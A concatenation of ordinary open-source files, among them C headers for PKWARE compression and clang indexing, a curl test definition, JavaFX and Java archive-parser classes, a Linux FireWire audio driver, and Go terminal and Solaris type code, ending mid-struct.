unsigned char dist_codes[0x40]; // 005C: Distance codes
unsigned char nChBits[0x306]; // 009C: Table of literal bit lengths to be put to the output stream
unsigned short nChCodes[0x306]; // 03A2: Table of literal codes to be put to the output stream
unsigned short offs09AE; // 09AE:
void * param; // 09B0: User parameter
unsigned int (*read_buf)(char *buf, unsigned int *size, void *param); // 9B4
void (*write_buf)(char *buf, unsigned int *size, void *param); // 9B8
unsigned short offs09BC[0x204]; // 09BC:
unsigned long offs0DC4; // 0DC4:
unsigned short phash_to_index[0x900]; // 0DC8: Array of indexes (one for each PAIR_HASH) to the "pair_hash_offsets" table
unsigned short phash_to_index_end; // 1FC8: End marker for "phash_to_index" table
char out_buff[0x802]; // 1FCA: Compressed data
unsigned char work_buff[0x2204]; // 27CC: Work buffer
// + DICT_OFFSET => Dictionary
// + UNCMP_OFFSET => Uncompressed data
unsigned short phash_offs[0x2204]; // 49D0: Table of offsets for each PAIR_HASH
} TCmpStruct;
#define CMP_BUFFER_SIZE sizeof(TCmpStruct) // Size of compression structure.
// Defined as 36312 in pkware header file
// Decompression structure
typedef struct
{
unsigned long offs0000; // 0000
unsigned long ctype; // 0004: Compression type (CMP_BINARY or CMP_ASCII)
unsigned long outputPos; // 0008: Position in output buffer
unsigned long dsize_bits; // 000C: Dict size (4, 5, 6 for 0x400, 0x800, 0x1000)
unsigned long dsize_mask; // 0010: Dict size bitmask (0x0F, 0x1F, 0x3F for 0x400, 0x800, 0x1000)
unsigned long bit_buff; // 0014: 16-bit buffer for processing input data
unsigned long extra_bits; // 0018: Number of extra (above 8) bits in bit buffer
unsigned int in_pos; // 001C: Position in in_buff
unsigned long in_bytes; // 0020: Number of bytes in input buffer
void * param; // 0024: Custom parameter
unsigned int (*read_buf)(char *buf, unsigned int *size, void *param); // Pointer to function that reads data from the input stream
void (*write_buf)(char *buf, unsigned int *size, void *param);// Pointer to function that writes data to the output stream
unsigned char out_buff[0x2204]; // 0030: Output circle buffer.
// 0x0000 - 0x0FFF: Previous uncompressed data, kept for repetitions
// 0x1000 - 0x1FFF: Currently decompressed data
// 0x2000 - 0x2203: Reserve space for the longest possible repetition
unsigned char in_buff[0x800]; // 2234: Buffer for data to be decompressed
unsigned char DistPosCodes[0x100]; // 2A34: Table of distance position codes
unsigned char LengthCodes[0x100]; // 2B34: Table of length codes
unsigned char offs2C34[0x100]; // 2C34: Buffer for
unsigned char offs2D34[0x100]; // 2D34: Buffer for
unsigned char offs2E34[0x80]; // 2EB4: Buffer for
unsigned char offs2EB4[0x100]; // 2EB4: Buffer for
unsigned char ChBitsAsc[0x100]; // 2FB4: Buffer for
unsigned char DistBits[0x40]; // 30B4: Numbers of bytes to skip copied block length
unsigned char LenBits[0x10]; // 30F4: Numbers of bits for skip copied block length
unsigned char ExLenBits[0x10]; // 3104: Number of valid bits for copied block
unsigned short LenBase[0x10]; // 3114: Buffer for
} TDcmpStruct;
#define EXP_BUFFER_SIZE sizeof(TDcmpStruct) // Size of decompression structure
// Defined as 12596 in pkware headers
//-----------------------------------------------------------------------------
// Public functions
#ifdef __cplusplus
extern "C" {
#endif
unsigned int PKEXPORT implode(
unsigned int (*read_buf)(char *buf, unsigned int *size, void *param),
void (*write_buf)(char *buf, unsigned int *size, void *param),
char *work_buf,
void *param,
unsigned int *type,
unsigned int *dsize);
unsigned int PKEXPORT explode(
unsigned int (*read_buf)(char *buf, unsigned int *size, void *param),
void (*write_buf)(char *buf, unsigned int *size, void *param),
char *work_buf,
void *param);
// The original name "crc32" was changed to "crc32pk" due
// to compatibility with zlib
unsigned long PKEXPORT crc32_pklib(char *buffer, unsigned int *size, unsigned long *old_crc);
#ifdef __cplusplus
} // End of 'extern "C"' declaration
#endif
#endif // __PKLIB_H__
|
{
"pile_set_name": "Github"
}
|
//===- USRGeneration.h - Routines for USR generation ----------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_INDEX_USRGENERATION_H
#define LLVM_CLANG_INDEX_USRGENERATION_H
#include "clang/Basic/LLVM.h"
#include "llvm/ADT/StringRef.h"
namespace clang {
class Decl;
class MacroDefinitionRecord;
class SourceLocation;
class SourceManager;
namespace index {
static inline StringRef getUSRSpacePrefix() {
return "c:";
}
/// \brief Generate a USR for a Decl, including the USR prefix.
/// \returns true if the results should be ignored, false otherwise.
bool generateUSRForDecl(const Decl *D, SmallVectorImpl<char> &Buf);
/// \brief Generate a USR fragment for an Objective-C class.
void generateUSRForObjCClass(StringRef Cls, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "",
StringRef CategoryContextExtSymbolDefinedIn = "");
/// \brief Generate a USR fragment for an Objective-C class category.
void generateUSRForObjCCategory(StringRef Cls, StringRef Cat, raw_ostream &OS,
StringRef ClsExtSymbolDefinedIn = "",
StringRef CatExtSymbolDefinedIn = "");
/// \brief Generate a USR fragment for an Objective-C instance variable. The
/// complete USR can be created by concatenating the USR for the
/// encompassing class with this USR fragment.
void generateUSRForObjCIvar(StringRef Ivar, raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C method.
void generateUSRForObjCMethod(StringRef Sel, bool IsInstanceMethod,
raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C property.
void generateUSRForObjCProperty(StringRef Prop, bool isClassProp, raw_ostream &OS);
/// \brief Generate a USR fragment for an Objective-C protocol.
void generateUSRForObjCProtocol(StringRef Prot, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "");
/// Generate USR fragment for a global (non-nested) enum.
void generateUSRForGlobalEnum(StringRef EnumName, raw_ostream &OS,
StringRef ExtSymbolDefinedIn = "");
/// Generate a USR fragment for an enum constant.
void generateUSRForEnumConstant(StringRef EnumConstantName, raw_ostream &OS);
/// \brief Generate a USR for a macro, including the USR prefix.
///
/// \returns true on error, false on success.
bool generateUSRForMacro(const MacroDefinitionRecord *MD,
const SourceManager &SM, SmallVectorImpl<char> &Buf);
bool generateUSRForMacro(StringRef MacroName, SourceLocation Loc,
const SourceManager &SM, SmallVectorImpl<char> &Buf);
} // namespace index
} // namespace clang
#endif // LLVM_CLANG_IDE_USRGENERATION_H
|
{
"pile_set_name": "Github"
}
|
<testcase>
<info>
<keywords>
printf
unittest
</keywords>
</info>
#
# Server-side
<reply>
</reply>
# Client-side
<client>
<server>
none
</server>
# tool is what to use instead of 'curl'
<tool>
lib557
</tool>
<name>
curl_mprintf() testing
</name>
<command>
nothing
</command>
</client>
#
# Verify data after the test has been "shot"
<verify>
<stdout>
All curl_mprintf() unsigned short tests OK!
All curl_mprintf() signed short tests OK!
All curl_mprintf() unsigned int tests OK!
All curl_mprintf() signed int tests OK!
All curl_mprintf() unsigned long tests OK!
All curl_mprintf() signed long tests OK!
All curl_mprintf() curl_off_t tests OK!
All curl_mprintf() strings tests OK!
All float strings tests OK!
</stdout>
</verify>
</testcase>
|
{
"pile_set_name": "Github"
}
|
@using Sitecore
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Foundation.Theming.Extensions
@model Sitecore.Mvc.Presentation.RenderingModel
<div class="@Model.Rendering.GetContainerClass()">
<div class="row">
<div class="col-lg-8">
<article>
@Html.Sitecore().DynamicPlaceholder("col-wide-1", Model.Rendering.GetUseStaticPlaceholderNames())
</article>
<div>
@Html.Sitecore().DynamicPlaceholder("section-narrow", Model.Rendering.GetUseStaticPlaceholderNames())
</div>
</div>
<div class="col-lg-4">
<aside>
@Html.Sitecore().DynamicPlaceholder("col-narrow-1", Model.Rendering.GetUseStaticPlaceholderNames())
</aside>
</div>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright (c) 2010, 2017, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
package javafx.scene.input;
import com.sun.javafx.tk.Toolkit;
import javafx.beans.NamedArg;
import javafx.event.EventTarget;
import javafx.event.EventType;
import com.sun.javafx.scene.input.KeyCodeMap;
import javafx.event.Event;
import javafx.scene.input.ScrollEvent.HorizontalTextScrollUnits;
import javafx.scene.input.ScrollEvent.VerticalTextScrollUnits;
/**
* An event which indicates that a keystroke occurred in a {@link javafx.scene.Node}.
* <p>
* This event is generated when a key is pressed, released, or typed.
* Depending on the type of the event it is passed
* to {@link javafx.scene.Node#onKeyPressedProperty onKeyPressed}, {@link javafx.scene.Node#onKeyTypedProperty onKeyTyped}
* or {@link javafx.scene.Node#onKeyReleasedProperty onKeyReleased} function.
*
* <p>
* <em>"Key typed" events</em> are higher-level and generally do not depend on
* the platform or keyboard layout. They are generated when a Unicode character
* is entered, and are the preferred way to find out about character input.
* In the simplest case, a key typed event is produced by a single key press
* (e.g., 'a'). Often, however, characters are produced by series of key
* presses (e.g., SHIFT + 'a'), and the mapping from key pressed events to
* key typed events may be many-to-one or many-to-many. Key releases are not
* usually necessary to generate a key typed event, but there are some cases
* where the key typed event is not generated until a key is released (e.g.,
* entering ASCII sequences via the Alt-Numpad method in Windows).
* No key typed events are generated for keys that don't generate Unicode
* characters (e.g., action keys, modifier keys, etc.).
*
* <p>
* The {@code character} variable always contains a valid Unicode character(s)
* or CHAR_UNDEFINED. Character input is reported by key typed events;
* key pressed and key released events are not necessarily associated
* with character input. Therefore, the {@code character} variable
* is guaranteed to be meaningful only for key typed events.
*
* <p>
* For key pressed and key released events, the {@code code} variable contains
* the event's key code. For key typed events, the {@code code} variable
* always contains {@code KeyCode.UNDEFINED}.
*
* <p>
* <em>"Key pressed" and "key released" events</em> are lower-level and depend
* on the platform and keyboard layout. They are generated whenever a key is
* pressed or released, and are the only way to find out about keys that don't
* generate character input (e.g., action keys, modifier keys, etc.). The key
* being pressed or released is indicated by the code variable, which contains
* a virtual key code.
*
* <p>
* For triggering context menus see the {@link ContextMenuEvent}.
* @since JavaFX 2.0
*/
public final class KeyEvent extends InputEvent {
private static final long serialVersionUID = 20121107L;
/**
* Common supertype for all key event types.
*/
public static final EventType<KeyEvent> ANY =
new EventType<KeyEvent>(InputEvent.ANY, "KEY");
/**
* This event occurs when a key has been pressed.
*/
public static final EventType<KeyEvent> KEY_PRESSED =
new EventType<KeyEvent>(KeyEvent.ANY, "KEY_PRESSED");
/**
* This event occurs when a key has been released.
*/
public static final EventType<KeyEvent> KEY_RELEASED =
new EventType<KeyEvent>(KeyEvent.ANY, "KEY_RELEASED");
/**
* This event occurs when a character-generating key was typed
* (pressed and released). The event contains the {@code character}
* field containing the typed string, the {@code code} and {@code text}
* fields are not used.
*/
public static final EventType<KeyEvent> KEY_TYPED =
new EventType<KeyEvent>(KeyEvent.ANY, "KEY_TYPED");
/**
* Constructs a new {@code KeyEvent} event from the specified parameters.
* @param source the source of the event. Can be null.
* @param target the target of the event. Can be null.
* @param eventType The type of the event.
* @param character The character or sequence of characters associated with the event
* @param text A String describing the key code
* @param code The integer key code
* @param shiftDown true if shift modifier was pressed.
* @param controlDown true if control modifier was pressed.
* @param altDown true if alt modifier was pressed.
* @param metaDown true if meta modifier was pressed.
* @since JavaFX 8.0
*/
public KeyEvent(@NamedArg("source") Object source, @NamedArg("target") EventTarget target, @NamedArg("eventType") EventType<KeyEvent> eventType, @NamedArg("character") String character,
@NamedArg("text") String text, @NamedArg("code") KeyCode code, @NamedArg("shiftDown") boolean shiftDown, @NamedArg("controlDown") boolean controlDown,
@NamedArg("altDown") boolean altDown, @NamedArg("metaDown") boolean metaDown) {
super(source, target, eventType);
boolean isKeyTyped = eventType == KEY_TYPED;
this.character = isKeyTyped ? character : KeyEvent.CHAR_UNDEFINED;
this.text = isKeyTyped ? "" : text;
this.code = isKeyTyped ? KeyCode.UNDEFINED : code;
this.shiftDown = shiftDown;
this.controlDown = controlDown;
this.altDown = altDown;
this.metaDown = metaDown;
}
/**
* Constructs a new {@code KeyEvent} event from the specified parameters,
* with a {@code null} source and target.
* @param eventType The type of the event.
* @param character The character or sequence of characters associated with the event
* @param text A String describing the key code
* @param code The integer key code
* @param shiftDown true if shift modifier was pressed.
* @param controlDown true if control modifier was pressed.
* @param altDown true if alt modifier was pressed.
* @param metaDown true if meta modifier was pressed.
* @since JavaFX 8.0
*/
public KeyEvent(@NamedArg("eventType") EventType<KeyEvent> eventType, @NamedArg("character") String character,
@NamedArg("text") String text, @NamedArg("code") KeyCode code, @NamedArg("shiftDown") boolean shiftDown, @NamedArg("controlDown") boolean controlDown,
@NamedArg("altDown") boolean altDown, @NamedArg("metaDown") boolean metaDown) {
super(eventType);
boolean isKeyTyped = eventType == KEY_TYPED;
this.character = isKeyTyped ? character : KeyEvent.CHAR_UNDEFINED;
this.text = isKeyTyped ? "" : text;
this.code = isKeyTyped ? KeyCode.UNDEFINED : code;
this.shiftDown = shiftDown;
this.controlDown = controlDown;
this.altDown = altDown;
this.metaDown = metaDown;
}
/**
* KEY_PRESSED and KEY_RELEASED events which do not map to a valid Unicode
* character use this for the keyChar value.
*/
public static final String CHAR_UNDEFINED = KeyCode.UNDEFINED.ch;
/**
* The Unicode character or sequence of characters associated with the key
* typed event. Contains multiple elements if the key produced a single
* Unicode character from outside of the Basic Multilingual Plane which
* needs to be encoded by the corresponding surrogate pair in Java or if
* the key produced multiple Unicode characters itself.
* <p>
* For example, {@code character} will have the value "A" for a key typed
* event generated by pressing SHIFT + 'a'.
* For key pressed and key released events, {@code character} is always
* {@code CHAR_UNDEFINED}.
*/
private final String character;
/**
* The Unicode character or sequence of characters associated with the key
* typed event. Contains multiple elements if the key produced a single
* Unicode character from outside of the Basic Multilingual Plane which
* needs to be encoded by the corresponding surrogate pair in Java or if
* the key produced multiple Unicode characters itself.
* <p>
* For example, {@code character} will have the value "A" for a key typed
* event generated by pressing SHIFT + 'a'.
* For key pressed and key released events, {@code character} is always
* {@code CHAR_UNDEFINED}.
*
* @return The Unicode character(s) associated with the key typed event
*/
public final String getCharacter() {
return character;
}
/**
* A String describing the key code, such as "HOME", "F1" or "A",
* for key pressed and key released events.
* For key typed events, {@code text} is always the empty string.
*/
private final String text;
/**
* A String describing the key code, such as "HOME", "F1" or "A",
* for key pressed and key released events.
* For key typed events, {@code text} is always the empty string.
*
* @return A String describing the key code
*/
public final String getText() {
return text;
}
/**
* The integer key code associated with the key in this key
* pressed or key released event.
* For key typed events, {@code code} is always {@code KeyCode.UNDEFINED}.
*/
private final KeyCode code;
/**
* The key code associated with the key in this key pressed or key released
* event. For key typed events, {@code code} is always {@code KeyCode.UNDEFINED}.
*
* @return The key code associated with the key in this event,
* {@code KeyCode.UNDEFINED} for key typed event
*/
public final KeyCode getCode() {
return code;
}
/**
* Returns whether or not the Shift modifier is down on this event.
*/
private final boolean shiftDown;
/**
* Returns whether or not the Shift modifier is down on this event.
* @return whether or not the Shift modifier is down on this event.
*/
public final boolean isShiftDown() {
return shiftDown;
}
/**
* Returns whether or not the Control modifier is down on this event.
*/
private final boolean controlDown;
/**
* Returns whether or not the Control modifier is down on this event.
* @return whether or not the Control modifier is down on this event.
*/
public final boolean isControlDown() {
return controlDown;
}
/**
* Returns whether or not the Alt modifier is down on this event.
*/
private final boolean altDown;
/**
* Returns whether or not the Alt modifier is down on this event.
* @return whether or not the Alt modifier is down on this event.
*/
public final boolean isAltDown() {
return altDown;
}
/**
* Returns whether or not the Meta modifier is down on this event.
*/
private final boolean metaDown;
/**
* Returns whether or not the Meta modifier is down on this event.
* @return whether or not the Meta modifier is down on this event.
*/
public final boolean isMetaDown() {
return metaDown;
}
/**
* Returns whether or not the host platform common shortcut modifier is
* down on this event. This common shortcut modifier is a modifier key which
* is used commonly in shortcuts on the host platform. It is for example
* {@code control} on Windows and {@code meta} (command key) on Mac.
*
* @return {@code true} if the shortcut modifier is down, {@code false}
* otherwise
*/
public final boolean isShortcutDown() {
switch (Toolkit.getToolkit().getPlatformShortcutKey()) {
case SHIFT:
return shiftDown;
case CONTROL:
return controlDown;
case ALT:
return altDown;
case META:
return metaDown;
default:
return false;
}
}
/**
* Returns a string representation of this {@code KeyEvent} object.
* @return a string representation of this {@code KeyEvent} object.
*/
@Override public String toString() {
final StringBuilder sb = new StringBuilder("KeyEvent [");
sb.append("source = ").append(getSource());
sb.append(", target = ").append(getTarget());
sb.append(", eventType = ").append(getEventType());
sb.append(", consumed = ").append(isConsumed());
sb.append(", character = ").append(getCharacter());
sb.append(", text = ").append(getText());
sb.append(", code = ").append(getCode());
if (isShiftDown()) {
sb.append(", shiftDown");
}
if (isControlDown()) {
sb.append(", controlDown");
}
if (isAltDown()) {
sb.append(", altDown");
}
if (isMetaDown()) {
sb.append(", metaDown");
}
if (isShortcutDown()) {
sb.append(", shortcutDown");
}
return sb.append("]").toString();
}
@Override
public KeyEvent copyFor(Object newSource, EventTarget newTarget) {
return (KeyEvent) super.copyFor(newSource, newTarget);
}
/**
* Creates a copy of the given event with the given fields substituted.
* @param source the new source of the copied event
* @param target the new target of the copied event
* @param type the new event type.
* @return the event copy with the fields substituted
* @since JavaFX 8.0
*/
public KeyEvent copyFor(Object source, EventTarget target, EventType<KeyEvent> type) {
KeyEvent e = copyFor(source, target);
e.eventType = type;
return e;
}
@Override
public EventType<KeyEvent> getEventType() {
return (EventType<KeyEvent>) super.getEventType();
}
}
|
{
"pile_set_name": "Github"
}
|
package com.nkanaev.comics.parsers;
import com.nkanaev.comics.managers.NaturalOrderComparator;
import com.nkanaev.comics.managers.Utils;
import org.apache.commons.compress.archivers.sevenz.SevenZArchiveEntry;
import org.apache.commons.compress.archivers.sevenz.SevenZFile;
import java.io.*;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
public class SevenZParser implements Parser {
private List<SevenZEntry> mEntries;
private class SevenZEntry {
final SevenZArchiveEntry entry;
final byte[] bytes;
public SevenZEntry(SevenZArchiveEntry entry, byte[] bytes) {
this.entry = entry;
this.bytes = bytes;
}
}
@Override
public void parse(File file) throws IOException {
mEntries = new ArrayList<>();
SevenZFile sevenZFile = new SevenZFile(file);
SevenZArchiveEntry entry = sevenZFile.getNextEntry();
while (entry != null) {
if (entry.isDirectory()) {
continue;
}
if (Utils.isImage(entry.getName())) {
byte[] content = new byte[(int)entry.getSize()];
sevenZFile.read(content);
mEntries.add(new SevenZEntry(entry, content));
}
entry = sevenZFile.getNextEntry();
}
Collections.sort(mEntries, new NaturalOrderComparator() {
@Override
public String stringValue(Object o) {
return ((SevenZEntry) o).entry.getName();
}
});
}
@Override
public int numPages() {
return mEntries.size();
}
@Override
public InputStream getPage(int num) throws IOException {
return new ByteArrayInputStream(mEntries.get(num).bytes);
}
@Override
public String getType() {
return "tar";
}
@Override
public void destroy() throws IOException {
}
}
|
{
"pile_set_name": "Github"
}
|
// SPDX-License-Identifier: GPL-2.0-only
/*
* ff-hwdep.c - a part of driver for RME Fireface series
*
* Copyright (c) 2015-2017 Takashi Sakamoto
*/
/*
* This codes give three functionality.
*
* 1.get firewire node information
* 2.get notification about starting/stopping stream
* 3.lock/unlock stream
*/
#include "ff.h"
static long hwdep_read(struct snd_hwdep *hwdep, char __user *buf, long count,
loff_t *offset)
{
struct snd_ff *ff = hwdep->private_data;
DEFINE_WAIT(wait);
union snd_firewire_event event;
spin_lock_irq(&ff->lock);
while (!ff->dev_lock_changed) {
prepare_to_wait(&ff->hwdep_wait, &wait, TASK_INTERRUPTIBLE);
spin_unlock_irq(&ff->lock);
schedule();
finish_wait(&ff->hwdep_wait, &wait);
if (signal_pending(current))
return -ERESTARTSYS;
spin_lock_irq(&ff->lock);
}
memset(&event, 0, sizeof(event));
if (ff->dev_lock_changed) {
event.lock_status.type = SNDRV_FIREWIRE_EVENT_LOCK_STATUS;
event.lock_status.status = (ff->dev_lock_count > 0);
ff->dev_lock_changed = false;
count = min_t(long, count, sizeof(event.lock_status));
}
spin_unlock_irq(&ff->lock);
if (copy_to_user(buf, &event, count))
return -EFAULT;
return count;
}
static __poll_t hwdep_poll(struct snd_hwdep *hwdep, struct file *file,
poll_table *wait)
{
struct snd_ff *ff = hwdep->private_data;
__poll_t events;
poll_wait(file, &ff->hwdep_wait, wait);
spin_lock_irq(&ff->lock);
if (ff->dev_lock_changed)
events = EPOLLIN | EPOLLRDNORM;
else
events = 0;
spin_unlock_irq(&ff->lock);
return events;
}
static int hwdep_get_info(struct snd_ff *ff, void __user *arg)
{
struct fw_device *dev = fw_parent_device(ff->unit);
struct snd_firewire_get_info info;
memset(&info, 0, sizeof(info));
info.type = SNDRV_FIREWIRE_TYPE_FIREFACE;
info.card = dev->card->index;
*(__be32 *)&info.guid[0] = cpu_to_be32(dev->config_rom[3]);
*(__be32 *)&info.guid[4] = cpu_to_be32(dev->config_rom[4]);
strlcpy(info.device_name, dev_name(&dev->device),
sizeof(info.device_name));
if (copy_to_user(arg, &info, sizeof(info)))
return -EFAULT;
return 0;
}
static int hwdep_lock(struct snd_ff *ff)
{
int err;
spin_lock_irq(&ff->lock);
if (ff->dev_lock_count == 0) {
ff->dev_lock_count = -1;
err = 0;
} else {
err = -EBUSY;
}
spin_unlock_irq(&ff->lock);
return err;
}
static int hwdep_unlock(struct snd_ff *ff)
{
int err;
spin_lock_irq(&ff->lock);
if (ff->dev_lock_count == -1) {
ff->dev_lock_count = 0;
err = 0;
} else {
err = -EBADFD;
}
spin_unlock_irq(&ff->lock);
return err;
}
static int hwdep_release(struct snd_hwdep *hwdep, struct file *file)
{
struct snd_ff *ff = hwdep->private_data;
spin_lock_irq(&ff->lock);
if (ff->dev_lock_count == -1)
ff->dev_lock_count = 0;
spin_unlock_irq(&ff->lock);
return 0;
}
static int hwdep_ioctl(struct snd_hwdep *hwdep, struct file *file,
unsigned int cmd, unsigned long arg)
{
struct snd_ff *ff = hwdep->private_data;
switch (cmd) {
case SNDRV_FIREWIRE_IOCTL_GET_INFO:
return hwdep_get_info(ff, (void __user *)arg);
case SNDRV_FIREWIRE_IOCTL_LOCK:
return hwdep_lock(ff);
case SNDRV_FIREWIRE_IOCTL_UNLOCK:
return hwdep_unlock(ff);
default:
return -ENOIOCTLCMD;
}
}
#ifdef CONFIG_COMPAT
static int hwdep_compat_ioctl(struct snd_hwdep *hwdep, struct file *file,
unsigned int cmd, unsigned long arg)
{
return hwdep_ioctl(hwdep, file, cmd,
(unsigned long)compat_ptr(arg));
}
#else
#define hwdep_compat_ioctl NULL
#endif
int snd_ff_create_hwdep_devices(struct snd_ff *ff)
{
static const struct snd_hwdep_ops hwdep_ops = {
.read = hwdep_read,
.release = hwdep_release,
.poll = hwdep_poll,
.ioctl = hwdep_ioctl,
.ioctl_compat = hwdep_compat_ioctl,
};
struct snd_hwdep *hwdep;
int err;
err = snd_hwdep_new(ff->card, ff->card->driver, 0, &hwdep);
if (err < 0)
return err;
strcpy(hwdep->name, ff->card->driver);
hwdep->iface = SNDRV_HWDEP_IFACE_FW_FIREFACE;
hwdep->ops = hwdep_ops;
hwdep->private_data = ff;
hwdep->exclusive = true;
return 0;
}
|
{
"pile_set_name": "Github"
}
|
#define REACTOS_VERSION_DLL
#define REACTOS_STR_FILE_DESCRIPTION "ReactOS RPC server API"
#define REACTOS_STR_INTERNAL_NAME "rpcrt4"
#define REACTOS_STR_ORIGINAL_FILENAME "rpcrt4.dll"
#include <reactos/version.rc>
|
{
"pile_set_name": "Github"
}
|
["line
break"]
|
{
"pile_set_name": "Github"
}
|
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// a passthrough stream.
// basically just the most minimal sort of Transform stream.
// Every written chunk gets output as-is.
'use strict';
module.exports = PassThrough;
var Transform = require('./_stream_transform');
/*<replacement>*/
var util = require('core-util-is');
util.inherits = require('inherits');
/*</replacement>*/
util.inherits(PassThrough, Transform);
function PassThrough(options) {
if (!(this instanceof PassThrough)) return new PassThrough(options);
Transform.call(this, options);
}
PassThrough.prototype._transform = function (chunk, encoding, cb) {
cb(null, chunk);
};
|
{
"pile_set_name": "Github"
}
|
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build aix darwin dragonfly freebsd linux,!appengine netbsd openbsd
// Package terminal provides support functions for dealing with terminals, as
// commonly found on UNIX systems.
//
// Putting a terminal into raw mode is the most common requirement:
//
// oldState, err := terminal.MakeRaw(0)
// if err != nil {
// panic(err)
// }
// defer terminal.Restore(0, oldState)
package terminal // import "golang.org/x/crypto/ssh/terminal"
import (
"golang.org/x/sys/unix"
)
// State contains the state of a terminal.
type State struct {
termios unix.Termios
}
// IsTerminal returns whether the given file descriptor is a terminal.
func IsTerminal(fd int) bool {
_, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
return err == nil
}
// MakeRaw put the terminal connected to the given file descriptor into raw
// mode and returns the previous state of the terminal so that it can be
// restored.
func MakeRaw(fd int) (*State, error) {
termios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
if err != nil {
return nil, err
}
oldState := State{termios: *termios}
// This attempts to replicate the behaviour documented for cfmakeraw in
// the termios(3) manpage.
termios.Iflag &^= unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON
termios.Oflag &^= unix.OPOST
termios.Lflag &^= unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN
termios.Cflag &^= unix.CSIZE | unix.PARENB
termios.Cflag |= unix.CS8
termios.Cc[unix.VMIN] = 1
termios.Cc[unix.VTIME] = 0
if err := unix.IoctlSetTermios(fd, ioctlWriteTermios, termios); err != nil {
return nil, err
}
return &oldState, nil
}
// GetState returns the current state of a terminal which may be useful to
// restore the terminal after a signal.
func GetState(fd int) (*State, error) {
termios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
if err != nil {
return nil, err
}
return &State{termios: *termios}, nil
}
// Restore restores the terminal connected to the given file descriptor to a
// previous state.
func Restore(fd int, state *State) error {
return unix.IoctlSetTermios(fd, ioctlWriteTermios, &state.termios)
}
// GetSize returns the dimensions of the given terminal.
func GetSize(fd int) (width, height int, err error) {
ws, err := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ)
if err != nil {
return -1, -1, err
}
return int(ws.Col), int(ws.Row), nil
}
// passwordReader is an io.Reader that reads from a specific file descriptor.
type passwordReader int
func (r passwordReader) Read(buf []byte) (int, error) {
return unix.Read(int(r), buf)
}
// ReadPassword reads a line of input from a terminal without local echo. This
// is commonly used for inputting passwords and other sensitive data. The slice
// returned does not include the \n.
func ReadPassword(fd int) ([]byte, error) {
termios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)
if err != nil {
return nil, err
}
newState := *termios
newState.Lflag &^= unix.ECHO
newState.Lflag |= unix.ICANON | unix.ISIG
newState.Iflag |= unix.ICRNL
if err := unix.IoctlSetTermios(fd, ioctlWriteTermios, &newState); err != nil {
return nil, err
}
defer unix.IoctlSetTermios(fd, ioctlWriteTermios, termios)
return readPasswordLine(passwordReader(fd))
}
|
{
"pile_set_name": "Github"
}
|
// cgo -godefs types_solaris.go | go run mkpost.go
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,solaris
package unix
const (
SizeofPtr = 0x8
SizeofShort = 0x2
SizeofInt = 0x4
SizeofLong = 0x8
SizeofLongLong = 0x8
PathMax = 0x400
MaxHostNameLen = 0x100
)
type (
_C_short int16
_C_int int32
_C_long int64
_C_long_long int64
)
type Timespec struct {
Sec int64
Nsec int64
}
type Timeval struct {
Sec int64
Usec int64
}
type Timeval32 struct {
Sec int32
Usec int32
}
type Tms struct {
Utime int64
Stime int64
Cutime int64
Cstime int64
}
type Utimbuf struct {
Actime int64
Modtime int64
}
type Rusage struct {
Utime Timeval
Stime Timeval
Maxrss int64
Ixrss int64
Idrss int64
Isrss int64
Minflt int64
Majflt int64
Nswap int64
Inblock int64
Oublock int64
Msgsnd int64
Msgrcv int64
Nsignals int64
Nvcsw int64
Nivcsw int64
}
type Rlimit struct {
Cur uint64
Max uint64
}
type _Gid_t uint32
type Stat_t struct {
Dev uint64
Ino uint64
